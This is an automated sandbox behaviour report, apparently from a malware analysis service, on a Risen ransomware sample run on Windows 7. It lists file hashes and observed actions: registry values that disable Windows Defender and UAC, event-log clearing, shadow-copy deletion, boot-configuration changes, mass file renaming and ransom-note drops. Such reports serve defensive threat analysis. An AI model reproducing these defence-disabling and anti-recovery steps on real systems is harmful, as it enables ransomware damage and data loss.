Analysis
-
max time kernel
200s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
15/05/2024, 15:52
Behavioral task
behavioral1
Sample
risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
Resource
win10v2004-20240426-en
General
-
Target
risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
-
Size
149KB
-
MD5
0444b3d690823924667302cfae1f0655
-
SHA1
737d0d001e60ce20c8f35a2bbac0f4d525b96174
-
SHA256
3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5
-
SHA512
5dacf16ce60bb5191708de906a920ab63fa3d5458fc7331013d8c3997beae802f0ea4b318392b1c4c6e15417a15423661e6bb4cb072adb33338493b1aac2c57d
-
SSDEEP
3072:wz5vBHTp2Obwai/tge32Vhh53u8rrsusAkeOe494flyntoGNout:wtvBlZc/tZ3yh53u8rg/AkFe4ufkntVZ
Malware Config
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 228 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2016 wevtutil.exe 2720 wevtutil.exe 320 wevtutil.exe 2416 wevtutil.exe 1948 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 636 bcdedit.exe 616 bcdedit.exe -
Renames multiple (2898) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1592 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1292 cmd.exe -
resource yara_rule behavioral1/memory/2904-0-0x0000000000900000-0x000000000096E000-memory.dmp upx behavioral1/memory/2904-11450-0x0000000000900000-0x000000000096E000-memory.dmp upx behavioral1/memory/2904-11452-0x0000000000900000-0x000000000096E000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\Q: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\Z: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\L: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\W: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\I: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\K: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\Y: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\S: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\N: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\M: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\U: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\O: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\P: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\V: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\H: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\X: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\B: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\T: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\G: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\A: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\J: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\M: fsutil.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\RisenBackGround.JPG" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\$Risen[GL6MNBAZEJ].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain.wmv risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-lib-uihandler.xml_hidden risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground.wmv risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\play-background.png risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\$Risen[GL6MNBAZEJ].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\$Risen[GL6MNBAZEJ].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\$Risen[GL6MNBAZEJ].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\$Risen[GL6MNBAZEJ].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\it\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\$Risen[GL6MNBAZEJ].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-spi-actions.xml_hidden risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\LockClose.raw risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1916 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 864 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1828 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1684 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2072 mshta.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeRestorePrivilege 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeBackupPrivilege 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeTakeOwnershipPrivilege 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeAuditPrivilege 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeSecurityPrivilege 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeIncBasePriorityPrivilege 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeBackupPrivilege 2808 vssvc.exe Token: SeRestorePrivilege 2808 vssvc.exe Token: SeAuditPrivilege 2808 vssvc.exe Token: SeSecurityPrivilege 2016 wevtutil.exe Token: SeBackupPrivilege 2016 wevtutil.exe Token: SeSecurityPrivilege 2720 wevtutil.exe Token: SeBackupPrivilege 2720 wevtutil.exe Token: SeSecurityPrivilege 320 wevtutil.exe Token: SeBackupPrivilege 320 wevtutil.exe Token: SeSecurityPrivilege 2416 wevtutil.exe Token: SeBackupPrivilege 2416 wevtutil.exe Token: SeSecurityPrivilege 1948 wevtutil.exe Token: SeBackupPrivilege 1948 wevtutil.exe Token: SeDebugPrivilege 1828 taskkill.exe Token: SeBackupPrivilege 1732 wbengine.exe Token: SeRestorePrivilege 1732 wbengine.exe Token: SeSecurityPrivilege 1732 wbengine.exe Token: SeBackupPrivilege 2920 vssvc.exe Token: SeRestorePrivilege 2920 vssvc.exe Token: SeAuditPrivilege 2920 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2904 wrote to memory of 2100 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 29 PID 2904 wrote to memory of 2100 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 29 PID 2904 wrote to memory of 2100 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 29 PID 2904 wrote to memory of 2100 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 29 PID 2904 wrote to memory of 2756 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 31 PID 2904 wrote to memory of 2756 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 31 PID 2904 wrote to memory of 2756 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 31 PID 2904 wrote to memory of 2756 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 31 PID 2100 wrote to memory of 1396 2100 cmd.exe 33 PID 2100 wrote to memory of 1396 2100 cmd.exe 33 PID 2100 wrote to memory of 1396 2100 cmd.exe 33 PID 2904 wrote to memory of 3056 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 34 PID 2904 wrote to memory of 3056 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 34 PID 2904 wrote to memory of 3056 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 34 PID 2904 wrote to memory of 3056 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 34 PID 2756 wrote to memory of 2116 2756 cmd.exe 36 PID 2756 wrote to memory of 2116 2756 cmd.exe 36 PID 2756 wrote to memory of 2116 2756 cmd.exe 36 PID 2904 wrote to memory of 2572 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 37 PID 2904 wrote to memory of 2572 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 37 PID 2904 wrote to memory of 2572 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 37 PID 2904 wrote to memory of 2572 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 37 PID 2904 wrote to memory of 2620 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 38 PID 2904 wrote to memory of 2620 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 38 PID 2904 wrote to memory of 2620 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 38 PID 2904 wrote to memory of 2620 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 38 PID 2904 wrote to memory of 2728 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 41 PID 2904 wrote to memory of 2728 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 41 PID 2904 wrote to memory of 2728 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 41 PID 2904 wrote to memory of 2728 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 41 PID 2904 wrote to memory of 2564 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 43 PID 2904 wrote to memory of 2564 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 43 PID 2904 wrote to memory of 2564 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 43 PID 2904 wrote to memory of 2564 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 43 PID 3056 wrote to memory of 2440 3056 cmd.exe 44 PID 3056 wrote to memory of 2440 3056 cmd.exe 44 PID 3056 wrote to memory of 2440 3056 cmd.exe 44 PID 2904 wrote to memory of 2956 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 45 PID 2904 wrote to memory of 2956 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 45 PID 2904 wrote to memory of 2956 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 45 PID 2904 wrote to memory of 2956 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 45 PID 2904 wrote to memory of 2792 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 47 PID 2904 wrote to memory of 2792 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 47 PID 2904 wrote to memory of 2792 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 47 PID 2904 wrote to memory of 2792 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 47 PID 2620 wrote to memory of 2384 2620 cmd.exe 46 PID 2620 wrote to memory of 2384 2620 cmd.exe 46 PID 2620 wrote to memory of 2384 2620 cmd.exe 46 PID 2572 wrote to memory of 2548 2572 cmd.exe 48 PID 2572 wrote to memory of 2548 2572 cmd.exe 48 PID 2572 wrote to memory of 2548 2572 cmd.exe 48 PID 2904 wrote to memory of 2708 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 49 PID 2904 wrote to memory of 2708 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 49 PID 2904 wrote to memory of 2708 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 49 PID 2904 wrote to memory of 2708 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 49 PID 2904 wrote to memory of 2456 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 53 PID 2904 wrote to memory of 2456 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 53 PID 2904 wrote to memory of 2456 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 53 PID 2904 wrote to memory of 2456 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 53 PID 2904 wrote to memory of 2432 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 56 PID 2904 wrote to memory of 2432 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 56 PID 2904 wrote to memory of 2432 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 56 PID 2904 wrote to memory of 2432 2904 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 56 PID 2728 wrote to memory of 2452 2728 cmd.exe 58 -
System policy modification 1 TTPs 3 IoCs
